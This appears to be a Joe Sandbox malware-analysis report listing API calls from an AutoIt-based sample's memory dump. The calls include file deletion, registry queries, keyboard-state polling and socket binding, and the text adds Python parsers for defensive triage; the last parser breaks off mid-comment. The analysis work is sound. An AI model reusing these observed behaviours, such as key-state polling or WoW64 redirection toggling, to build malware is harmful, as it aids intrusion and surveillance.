                                        • API ID: FolderPath_wcslen
                                        • String ID:
                                        • API String ID: 2987691875-0
                                        • Opcode ID: e521a1d2fd801cb76345db97dcb245c3cbfe82ed1481b03ed19446ce8f51102b
                                        • Instruction ID: 3cfd024946656ccae07b4718d46a2ba3f3cba13c6a450bc3a21def344be30d15
                                        • Opcode Fuzzy Hash: e521a1d2fd801cb76345db97dcb245c3cbfe82ed1481b03ed19446ce8f51102b
                                        • Instruction Fuzzy Hash: 23D05EA19002282FDF60A6749C0DDBB3AACC740220F0046A07C6DD3192E934ED4486A4
                                        APIs
                                        • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0075D9DC,?,?), ref: 0075DA72
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CopyFile
                                        • String ID:
                                        • API String ID: 1304948518-0
                                        • Opcode ID: a32d95919d1a82e28cb09b7a8937cf1090465207e28af03eb68b83393e491894
                                        • Instruction ID: 14d69e3829b7083317e1734a040874d5d7c252f8831b9fb6ab5d4ea30062e802
                                        • Opcode Fuzzy Hash: a32d95919d1a82e28cb09b7a8937cf1090465207e28af03eb68b83393e491894
                                        • Instruction Fuzzy Hash: 4ED0C7305D0209BBEF509B51CD07F99B76CE711B45F204194B101EA0D0D7B5A9199769
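The entries above for sub-functions 006F6332 and 006F62FB show the classic LoadLibraryA / GetProcAddress / FreeLibrary triple resolving Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection at run time, the LoadLibraryExW call passes 00000002 as its third argument, ReadFile is issued with 00010000 as its byte count, and CopyFileExW carries 00000008 in its sixth slot. The Python below is an added example and is not part of the Joe Sandbox report or its IDA plugin: it parses records in the report's "APIs" bullet format and decodes the argument positions a reviewer otherwise checks by hand. It assumes that the parenthesised values are the stack contents at the call and that the first N of them map to the API's parameters in declaration order (values printed as ? are unknown and are never decoded); the flag names are the winbase.h constants LOAD_LIBRARY_AS_DATAFILE (0x2) and COPY_FILE_ALLOW_DECRYPTED_DESTINATION (0x8). The sample records are copied from this section.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: "APIs" records copied from the Joe Sandbox entries for the
# 0x6F0000 dump of process 6, one record per line, exactly as the report prints them.
SAMPLE_RECORDS = """\
• Part of subcall function 006F6332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F633E
• Part of subcall function 006F6332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 006F6350
• Part of subcall function 006F6332: FreeLibrary.KERNEL32(00000000,?,?,006F637F,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6362
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F639F
• Part of subcall function 006F62FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6304
• Part of subcall function 006F62FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6316
• Part of subcall function 006F62FB: FreeLibrary.KERNEL32(00000000,?,?,007354C3,?,?,006F60AA,?,00000001,?,?,00000000), ref: 006F6329
• ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,006F6B73,?,00010000,00000000,00000000,00000000,00000000), ref: 006FB0AC
• CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0075D9DC,?,?), ref: 0075DA72
"""

# winbase.h constants
LOAD_LIBRARY_AS_DATAFILE = 0x00000002
COPY_FILE_ALLOW_DECRYPTED_DESTINATION = 0x00000008

RECORD_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]             # stack values at the call as printed; '?' means unknown
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # sub-function that issues the call, if the record names one

    def arg_int(self, index: int) -> Optional[int]:
        """Argument `index` as an int when it is an 8-digit hex literal, else None."""
        if index < len(self.args) and re.fullmatch(r"[0-9A-Fa-f]{8}", self.args[index]):
            return int(self.args[index], 16)
        return None


def parse_records(text: str) -> List[ApiCall]:
    """Parse Joe Sandbox 'APIs' bullet lines; lines that do not match are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            sub = m.group("sub")
            calls.append(ApiCall(m.group("api"), m.group("module"), m.group("args").split(","),
                                 int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def find_resolver_stubs(calls: List[ApiCall]) -> Dict[int, str]:
    """Sub-function address -> symbol, for LoadLibraryA -> GetProcAddress -> FreeLibrary triples.
    Such a stub resolves one export at run time, so the name never appears in the import table."""
    by_func: Dict[int, List[ApiCall]] = {}
    for c in calls:
        if c.subcall_of is not None:
            by_func.setdefault(c.subcall_of, []).append(c)
    stubs: Dict[int, str] = {}
    for func, seq in by_func.items():
        apis = [c.api for c in seq]
        if all(a in apis for a in ("LoadLibraryA", "GetProcAddress", "FreeLibrary")) and \
                apis.index("LoadLibraryA") < apis.index("GetProcAddress") < apis.index("FreeLibrary"):
            stubs[func] = next(c for c in seq if c.api == "GetProcAddress").args[1]
    return stubs


def triage(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Decode the argument positions a reviewer checks by hand; returns (ref, note) pairs."""
    out: List[Tuple[str, str]] = []
    for c in calls:
        ref = f"{c.ref:08X}"
        if c.api == "GetProcAddress" and len(c.args) > 1 and re.fullmatch(r"[A-Za-z_]\w*", c.args[1]):
            note = f"GetProcAddress({c.args[1]}): import resolved at run time, absent from the IAT"
            if c.args[1].startswith("Wow64"):
                note += "; toggles WoW64 file-system redirection, so System32 paths may hit the 64-bit directory"
            out.append((ref, note))
        elif c.api == "LoadLibraryExW" and (c.arg_int(2) or 0) & LOAD_LIBRARY_AS_DATAFILE:  # dwFlags
            out.append((ref, "LoadLibraryExW with LOAD_LIBRARY_AS_DATAFILE: file mapped as data, DllMain not run"))
        elif c.api == "CopyFileExW" and (c.arg_int(5) or 0) & COPY_FILE_ALLOW_DECRYPTED_DESTINATION:  # dwCopyFlags
            out.append((ref, "CopyFileExW with COPY_FILE_ALLOW_DECRYPTED_DESTINATION (0x8)"))
        elif c.api == "ReadFile" and c.arg_int(2) is not None:  # nNumberOfBytesToRead
            out.append((ref, f"ReadFile in 0x{c.arg_int(2):X}-byte chunks"))
    return out


if __name__ == "__main__":
    parsed = parse_records(SAMPLE_RECORDS)
    for func, sym in find_resolver_stubs(parsed).items():
        print(f"resolver stub at {func:08X} -> {sym}")
    for ref, note in triage(parsed):
        print(f"{ref}: {note}")
```

Only 8-digit hex literals are decoded, so a flag the sandbox could not recover is reported as absent rather than as clear; read a missing note as "unknown", not "safe". The FreeLibrary directly after GetProcAddress in both stubs is harmless only because kernel32.dll is never unloaded from a process; the same pattern against a DLL that nothing else holds would leave the resolved pointer dangling.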
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,00000000,?,00730AA4,?,?,00000000,?,00730AA4,00000000,0000000C), ref: 00730757
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                        • Instruction ID: 18b1a88bf2d1dba6c40c6868ce82b9f6e941b26fba90775001f97d2bc4ff62ee
                                        • Opcode Fuzzy Hash: 862aefab0c5d76596048e05c452c3b3a451d3aba9ef0f99456a859c9b0f2f915
                                        • Instruction Fuzzy Hash: E3D06C3204010DBBDF128F84DD4AEDA3BAAFB48714F118000BE1896060C736E821AB94
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0075D755), ref: 0075E9C6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                        • Instruction ID: 181b227974c2387c80703067a6d6d176ec2a00bf2d3dccefe447382e92ca5cd9
                                        • Opcode Fuzzy Hash: 6913b93d5bba2f7c4fc7b78b37c1d94e697af5454e992c6b9a6e6fd50510c45e
                                        • Instruction Fuzzy Hash: 93B0923400061005BDBC0A381B0C4E9230068433B7BE81BD5E8B9961E2C37DAD0FE612
                                        APIs
                                          • Part of subcall function 0075DB69: FindFirstFileW.KERNELBASE(?,?), ref: 0075DBE0
                                          • Part of subcall function 0075DB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0075DC30
                                          • Part of subcall function 0075DB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 0075DC41
                                          • Part of subcall function 0075DB69: FindClose.KERNEL32(00000000), ref: 0075DC58
                                        • GetLastError.KERNEL32 ref: 00766583
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                        • String ID:
                                        • API String ID: 2191629493-0
                                        • Opcode ID: 206ac019926b1406f5581c8e76d6bc8bc5092579e2bab03f6a44a9194d8e6316
                                        • Instruction ID: 9acc602691fa18e0a8a21c740aaa9f1fa00a9f4c5344e8aa3e38f7516eb15dca
                                        • Opcode Fuzzy Hash: 206ac019926b1406f5581c8e76d6bc8bc5092579e2bab03f6a44a9194d8e6316
                                        • Instruction Fuzzy Hash: D6F082312002088FCB14EF58D845B6EB7E6AF44320F05804DFA068B352CB74FC018B98
                                        APIs
                                        • CloseHandle.KERNELBASE(?,?,00000000,00733A1C), ref: 006F7973
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 82ebb75bb19cc7114525beddd84fc47def381eda17bda93d56d09b0f7d715d46
                                        • Instruction ID: 1e0cf9e600d64250d5f3d6b9a1d3a7e8bc73858b9b5c89324ae3e24792919e62
                                        • Opcode Fuzzy Hash: 82ebb75bb19cc7114525beddd84fc47def381eda17bda93d56d09b0f7d715d46
                                        • Instruction Fuzzy Hash: 7FE0B675404B12CFC3314F1AE804462FBF5FFD23623214A2ED1E582660D3B05886DB50
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0076A11B
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0076A176
                                        • FindClose.KERNEL32(00000000), ref: 0076A181
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0076A19D
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0076A1ED
                                        • SetCurrentDirectoryW.KERNEL32(007B7B94), ref: 0076A20B
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0076A215
                                        • FindClose.KERNEL32(00000000), ref: 0076A222
                                        • FindClose.KERNEL32(00000000), ref: 0076A232
                                          • Part of subcall function 0075E2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0075E2C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 6c6b4b817c1af28e0f08e4737fac44b002fe5933feb6d5d7d8d3310cb5c72a0d
                                        • Instruction ID: 9275583285601428e29fb31e0fac965da17b8949047ba5f48a7105ff953ed58b
                                        • Opcode Fuzzy Hash: 6c6b4b817c1af28e0f08e4737fac44b002fe5933feb6d5d7d8d3310cb5c72a0d
                                        • Instruction Fuzzy Hash: BE31D271540219BECB24ABA4DC48ADE73ADAF85320F204151EC16B20D0DB7DDE85CF65
                                        APIs
                                          • Part of subcall function 0077D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C00D,?,?), ref: 0077D314
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D350
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3C7
                                          • Part of subcall function 0077D2F7: _wcslen.LIBCMT ref: 0077D3FD
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C89D
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0077C908
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077C92C
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077C98B
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0077CA46
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CAB3
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CB48
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0077CB99
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0077CC42
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0077CCE1
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0077CCEE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                        • String ID:
                                        • API String ID: 3102970594-0
                                        • Opcode ID: 0c10f8de7c3bc6d432ea8538c03a70fb36303e94f8696b0f95586628f98c4e20
                                        • Instruction ID: 541ccc4f1d0b89e8b55b687f54bed2edeaec2604a44d5f108fd58fdb49d2fde6
                                        • Opcode Fuzzy Hash: 0c10f8de7c3bc6d432ea8538c03a70fb36303e94f8696b0f95586628f98c4e20
                                        • Instruction Fuzzy Hash: AF0270716042049FDB15CF28C895E2ABBE5EF48344F18C49DF94ACB2A2DB35ED41CBA1
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 0075A572
                                        • GetAsyncKeyState.USER32(000000A0), ref: 0075A5F3
                                        • GetKeyState.USER32(000000A0), ref: 0075A60E
                                        • GetAsyncKeyState.USER32(000000A1), ref: 0075A628
                                        • GetKeyState.USER32(000000A1), ref: 0075A63D
                                        • GetAsyncKeyState.USER32(00000011), ref: 0075A655
                                        • GetKeyState.USER32(00000011), ref: 0075A667
                                        • GetAsyncKeyState.USER32(00000012), ref: 0075A67F
                                        • GetKeyState.USER32(00000012), ref: 0075A691
                                        • GetAsyncKeyState.USER32(0000005B), ref: 0075A6A9
                                        • GetKeyState.USER32(0000005B), ref: 0075A6BB
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                        • Instruction ID: 34d08b091faf7dc9e16bfa5da1cce4d7b39dde329968bea724b945fda0e05626
                                        • Opcode Fuzzy Hash: c5fea347080638fd1ba56944532282e8c3e48a364c4e6abb7e060dd3865e0707
                                        • Instruction Fuzzy Hash: 3E4193745047C97EFF31466084147E5BEA0AB11346F08826ADDC64A1C1EBEC9DECCB67
                                        APIs
                                        • CoInitialize.OLE32 ref: 007740D1
                                        • CoUninitialize.OLE32 ref: 007740DC
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00790B44,?), ref: 00774136
                                        • IIDFromString.OLE32(?,?), ref: 007741A9
                                        • VariantInit.OLEAUT32(?), ref: 00774241
                                        • VariantClear.OLEAUT32(?), ref: 00774293
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 636576611-1287834457
                                        • Opcode ID: 419dfb5ce89ad1d40f7a8de39cb4e13d99fcba2dc18f321389d2021ba5d728dc
                                        • Instruction ID: 4c876ce4e4dc6c20bb055f832a726625c56b8eef3151de819d5b6687db6deb48
                                        • Opcode Fuzzy Hash: 419dfb5ce89ad1d40f7a8de39cb4e13d99fcba2dc18f321389d2021ba5d728dc
                                        • Instruction Fuzzy Hash: 6D619070204301DFCB10EF64D849F6AB7E8BF45754F108949F9899B2A1D778ED84CB92
                                        APIs
                                          • Part of subcall function 006FB25F: _wcslen.LIBCMT ref: 006FB269
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 0076A4D5
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 0076A5E8
                                          • Part of subcall function 007641CE: GetInputState.USER32 ref: 00764225
                                          • Part of subcall function 007641CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007642C0
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 0076A505
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 0076A5D2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 863d835dbc3bdd5a04972ef2f6799c83db9b1ce8ab2a6b42c383046074029067
                                        • Instruction ID: 5fd854cd0670ad928b387d90cf0e1a349f5d5e99090789f737e420f7d73967d4
                                        • Opcode Fuzzy Hash: 863d835dbc3bdd5a04972ef2f6799c83db9b1ce8ab2a6b42c383046074029067
                                        • Instruction Fuzzy Hash: 83414F7194020EAFCF54DFA4C849AEEBBB5FF15310F24405AE906B2191DB789E94CF62
                                        APIs
                                        • DefDlgProcW.USER32(?,?), ref: 006F22EE
                                        • GetSysColor.USER32(0000000F), ref: 006F23C3
                                        • SetBkColor.GDI32(?,00000000), ref: 006F23D6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Color$Proc
                                        • String ID:
                                        • API String ID: 929743424-0
                                        • Opcode ID: d595370758fb792029164d800b4e0ef3b9496813c9d5b0f5d4c25ca671cf0ebf
                                        • Instruction ID: 56974dc7ae477154c44b2f4c9faf07357f936b4526eb577fe44fa26ba221cb62
                                        • Opcode Fuzzy Hash: d595370758fb792029164d800b4e0ef3b9496813c9d5b0f5d4c25ca671cf0ebf
                                        • Instruction Fuzzy Hash: AE81E7F124845DFEF63966798CADEBB164EDB42340F150209F342C9696CA1D9F02DA36
                                        APIs
                                          • Part of subcall function 007739AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007739D7
                                          • Part of subcall function 007739AB: _wcslen.LIBCMT ref: 007739F8
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007721BA
                                        • WSAGetLastError.WSOCK32 ref: 007721E1
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00772238
                                        • WSAGetLastError.WSOCK32 ref: 00772243
                                        • closesocket.WSOCK32(00000000), ref: 00772272
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 312ae314893688ea4e61703b7e76da6a0f815d87a8aa9fdf4d754ddf213abaaf
                                        • Instruction ID: de795b21a728bc9b6be2dec7c2d3649269b7b78ea82a8cb0ffde55e6a21971ab
                                        • Opcode Fuzzy Hash: 312ae314893688ea4e61703b7e76da6a0f815d87a8aa9fdf4d754ddf213abaaf
                                        • Instruction Fuzzy Hash: E151B271600204AFEB20AF64C896F2A77E6AB04754F55C09CFA199F3D3C775ED428BA1
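What follows is an added example, not part of the Joe Sandbox report and not code from the analysed sample: a Python parser for the function-listing format used above that turns each "APIs ... Similarity" entry into a capability summary. It decodes the socket(2, 2, 0x11) arguments in the WSOCK32 entry as AF_INET/SOCK_DGRAM/IPPROTO_UDP, names the virtual-key constants polled in the GetAsyncKeyState entry (0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN), counts only direct calls by default so "Part of subcall function" lines are not attributed to the caller, and keeps every metadata bullet (API ID, Opcode ID, fuzzy hashes) in a dict for cross-report matching. The bullet and "ref:" syntax it parses is assumed from how the listing renders on this page; the SAMPLE input is constructed from abridged copies of entries above. One caveat for triage: the process-6 dump at 0x6F0000 is the AutoIt v3 interpreter (a later entry calls CreateWindowExW with the class name "AutoIt v3 GUI"), so these tags describe runtime library capability, not necessarily what the injected script does.

```python
"""Parse a Joe Sandbox IDA-plugin function listing into per-function capability tags."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input in the layout of this report's function listing (assumption: the
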